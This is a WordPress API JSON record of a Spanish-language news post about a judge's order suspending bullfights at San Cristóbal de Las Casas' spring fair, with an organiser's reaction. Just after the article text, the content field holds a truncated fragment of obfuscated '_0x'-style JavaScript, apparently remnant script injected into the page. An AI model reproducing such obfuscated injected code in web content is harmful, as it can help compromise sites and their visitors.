{"id":9454,"date":"2023-04-10T02:37:44","date_gmt":"2023-04-10T02:37:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9454"},"modified":"2023-04-10T02:37:45","modified_gmt":"2023-04-10T02:37:45","slug":"se-suspenden-corridas-de-toros-en-la-feria-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9454","title":{"rendered":"Se suspenden corridas de toros en la Feria de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"552\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-09-at-5.11.58-PM-1024x552.jpeg\" alt=\"\" class=\"wp-image-9455\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-09-at-5.11.58-PM-1024x552.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-09-at-5.11.58-PM-300x162.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-09-at-5.11.58-PM-768x414.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-09-at-5.11.58-PM-1536x828.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-09-at-5.11.58-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal09 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Como un hecho hist\u00f3rico en los inicios de la Feria de la Primavera y de la Paz, se suspendi\u00f3 la primer corrida de toros en esta ciudad, para acatar la disposici\u00f3n de un juez que otorg\u00f3 un amparo indirecto 519\/2023-V,  movido por Eduardo &#8220;N N&#8221;, en el cual consigue la suspensi\u00f3n de las corridas de toros en esta ciudad.\u201cEs una pena avisar, informar que la corrida programada para el d\u00eda de hoy (domingo 9 de abril) no se llevar\u00e1 a cabo, sin embargo la corrida no est\u00e1 cancelada, quiero ser muy preciso en ese hecho, la corrida \u00fanicamente se pospone, vamos a dar complimiento del matado de un juez que suspende la corrida de hoy, no queremos provocar actos de violencia en esta fiesta, San Crist\u00f3bal est\u00e1 viviendo su feria\u201d, dijo uno de los empresarios.Y es de acuerdo a un juez, orden\u00f3 la suspensi\u00f3n provisional \u201cpara el efecto de que las autoridades responsables: se abstengan de aplicar la norma reclamada en el municipio de San Crist\u00f3bal de Las Casas, para lo cual deber\u00e1n: a. Suspender de inmediato los espect\u00e1culos taurinos en dicho municipio de San Crist\u00f3bal de Las Casas, Chiapas programadas para los d\u00edas nueve, doce y diecis\u00e9is de abril del dos mil veintitr\u00e9s, incluida la venta de boletos, que est\u00e1n por llevarse a cabo en San Crist\u00f3bal de Las Casas, Chiapas, con motivo de la Feria de la Primavera y de la Paz\u201d.El empresario afirm\u00f3 que no van a suspender, ya que los toros est\u00e1n listos, y ser\u00e1 suspendido esta corrida, algo hist\u00f3rico que pasa en el marco de una Feria tan importante, esto derivado del amparo de un juez, el cual circul\u00f3 en redes sociales, que provoc\u00f3 que se congregar\u00e1n o citar\u00e1n \u201cgrupos de choque, que nada tienen que ver con la ciudadan\u00eda, con San Crist\u00f3bal, grupos de choque que est\u00e1n siendo patrocinados por intereses independientes a la fiesta\u201d. \u201cSe alega la protecci\u00f3n al ambiente, animales, la defensa, pero aqu\u00ed no se trata de eso\u201d, ya que indic\u00f3 se trata de intereses de terceros que no comulgan con la fiesta brava, \u201cpor intereses particulares, no por la fiesta, la gran mayor\u00eda est\u00e1n siendo pagados por alguien\u201d.Aunque no dijeron las nuevas fechas de las actividades, s\u00ed dejaron en claro que estas actividades no se suspenden, quedando pendientes cu\u00e1ndo se realizar\u00e1.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal09 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Como un hecho hist\u00f3rico en los inicios de la Feria de la Primavera y de la Paz, se suspendi\u00f3 la primer corrida de toros en esta ciudad, para acatar la disposici\u00f3n de un juez que otorg\u00f3 un amparo indirecto 519\/2023-V, movido por Eduardo &#8220;N &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9455,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9454","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9454","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9454"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9454\/revisions"}],"predecessor-version":[{"id":9456,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9454\/revisions\/9456"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9455"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9454"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9454"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9454"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}